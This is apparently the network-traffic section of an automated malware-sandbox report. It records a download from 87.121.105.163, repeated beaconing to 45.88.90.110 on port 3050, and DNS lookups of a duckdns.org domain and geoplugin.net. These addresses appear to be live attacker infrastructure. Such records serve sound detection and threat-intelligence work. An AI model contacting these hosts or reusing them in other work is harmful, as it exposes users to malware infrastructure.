                                            Apr 20, 2024 16:05:38.702877045 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702882051 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702892065 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702908993 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702915907 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702927113 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702939034 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702944994 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702963114 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702970982 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.702980995 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.702984095 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703000069 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703012943 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703016996 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703021049 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703036070 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703039885 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703052998 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703053951 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703069925 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703073025 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703089952 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703099966 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703113079 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703115940 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703130007 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703133106 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703150988 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703159094 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703171015 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703175068 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703186035 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703190088 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703205109 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703208923 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703226089 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703241110 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703265905 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703274012 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703284025 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703290939 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703303099 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703320980 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703337908 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703337908 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703339100 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703337908 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703356981 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703366995 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703376055 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703377962 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703394890 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703396082 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703413010 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703418016 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703435898 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703439951 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703454018 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703458071 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703474045 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703481913 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703485966 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703495979 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703505039 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703521967 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703541040 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703546047 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703557968 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703572989 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703593969 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703649044 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703666925 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703675985 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703694105 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703705072 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703711033 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703723907 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703728914 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703747034 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703764915 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703767061 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703783989 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703802109 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703834057 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703840971 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703840971 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703840971 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703851938 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703871012 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703872919 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703872919 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703888893 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703891039 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703907967 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703922987 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703922987 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703927994 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703943014 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703948021 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703967094 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703970909 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703985929 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.703989983 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.703999996 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704005957 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704024076 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704026937 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704042912 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704055071 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704055071 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704060078 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704082966 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704097033 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704117060 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704133987 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704152107 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704161882 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704170942 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704175949 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704190969 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704199076 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704209089 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704212904 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704226971 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704231024 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704245090 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704250097 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704262972 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704269886 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704282045 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704283953 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704299927 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704302073 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704315901 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704319954 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704334974 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704339027 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.704356909 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.704375029 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901447058 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901468992 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901485920 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901505947 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901506901 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901525021 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901544094 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901554108 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901562929 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901571035 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901582956 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901586056 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901601076 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901609898 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901621103 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901627064 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901638985 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901638985 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901654005 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901658058 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.901680946 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.901691914 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.902833939 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.902852058 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.902868032 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.902883053 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.902884960 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.902904034 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.902905941 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.902932882 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.902935982 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.902951002 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.902956963 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.902976990 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.902987957 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903003931 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903042078 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903328896 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903347969 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903364897 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903377056 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903387070 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903393030 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903414011 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903426886 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903527021 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903546095 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903563976 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903573990 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903584003 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903590918 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903605938 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903620958 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903757095 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903774023 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.903795958 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.903815031 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904475927 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904493093 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904510021 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904517889 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904531002 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904532909 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904548883 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904548883 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904567957 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904570103 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904582024 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904587984 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904604912 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904617071 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904622078 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904639959 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904659033 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904659033 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904676914 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904681921 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904696941 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.904697895 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904727936 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.904750109 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905320883 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905339956 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905356884 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905363083 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905375004 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905395985 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905395985 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905411005 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905416965 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905451059 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905453920 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905469894 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905488014 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905488968 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905499935 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905520916 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905536890 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905538082 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905560970 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905570984 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905571938 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905591011 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.905608892 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.905620098 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906191111 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906210899 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906241894 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906261921 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906277895 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906296015 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906317949 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906330109 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906331062 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906347036 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906366110 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906372070 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906382084 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906400919 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906404972 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906420946 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906435966 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906438112 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906461954 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906493902 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906500101 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906522989 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906541109 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906553984 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906605959 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906622887 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906650066 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906670094 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906735897 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906754971 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906783104 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906801939 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906801939 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906821966 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906838894 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906840086 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906860113 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:38.906860113 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906872988 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:38.906894922 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:39.988326073 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:05:40.184461117 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:05:40.184576035 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:05:40.186650038 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:05:40.422733068 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:05:40.426764011 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:05:40.622883081 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:05:40.678438902 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:05:40.735200882 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:05:40.945765018 CEST8049721178.237.33.50192.168.2.6
                                            Apr 20, 2024 16:05:40.945849895 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:05:40.946173906 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:05:41.160156965 CEST8049721178.237.33.50192.168.2.6
                                            Apr 20, 2024 16:05:41.160222054 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:05:41.185091019 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:05:41.430234909 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:05:42.159425974 CEST8049721178.237.33.50192.168.2.6
                                            Apr 20, 2024 16:05:42.160165071 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:05:42.573270082 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:43.705209017 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:43.705272913 CEST4971880192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:48.767647982 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:05:48.769582987 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:05:49.032063007 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:06:13.705889940 CEST804971887.121.105.163192.168.2.6
                                            Apr 20, 2024 16:06:19.053236008 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:06:19.055489063 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:06:19.304332972 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:06:49.321691036 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:06:49.323059082 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:06:49.569837093 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:07:10.444561005 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:07:10.991027117 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:07:12.100464106 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:07:14.303531885 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:07:18.492470026 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:07:19.625308990 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:07:19.631504059 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:07:19.881592035 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:07:26.897305012 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:07:43.600490093 CEST4972180192.168.2.6178.237.33.50
                                            Apr 20, 2024 16:07:49.852727890 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:07:49.857275009 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:07:50.116386890 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:08:20.009135008 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:08:20.010478020 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:08:20.271833897 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:08:50.361386061 CEST30504972045.88.90.110192.168.2.6
                                            Apr 20, 2024 16:08:50.362683058 CEST497203050192.168.2.645.88.90.110
                                            Apr 20, 2024 16:08:50.623426914 CEST30504972045.88.90.110192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 20, 2024 16:05:39.849409103 CEST5921853192.168.2.61.1.1.1
                                            Apr 20, 2024 16:05:39.985280037 CEST53592181.1.1.1192.168.2.6
                                            Apr 20, 2024 16:05:40.628751993 CEST5163653192.168.2.61.1.1.1
                                            Apr 20, 2024 16:05:40.734426975 CEST53516361.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Apr 20, 2024 16:05:39.849409103 CEST192.168.2.61.1.1.10x392cStandard query (0)jgbours284hawara01.duckdns.orgA (IP address)IN (0x0001)false
                                            Apr 20, 2024 16:05:40.628751993 CEST192.168.2.61.1.1.10x37fdStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Apr 20, 2024 16:05:39.985280037 CEST1.1.1.1192.168.2.60x392cNo error (0)jgbours284hawara01.duckdns.org45.88.90.110A (IP address)IN (0x0001)false
